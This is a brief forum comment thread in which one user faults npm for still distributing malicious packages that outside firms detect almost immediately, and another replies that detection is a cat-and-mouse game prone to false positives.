| ▲ | captn3m0 4 hours ago | |
1. _Multiple third-party companies_ can detect these obviously malicious packages in almost-real-time 2. NPM still not only publishes them, but also keeps distributing them for anything beyond 5 minutes. Microsoft/GitHub/NPM can only keep repeating "security is our top priority" so many times. But NPM still doesn't detect these simple attacks, and we keep having this every week. | ||
| ▲ | silverwind 2 hours ago | parent [-] | |
It'll always be a cat-and-mouse game. If npm adds protections, it'll only yield false-positives and workarounds will be trivial. | ||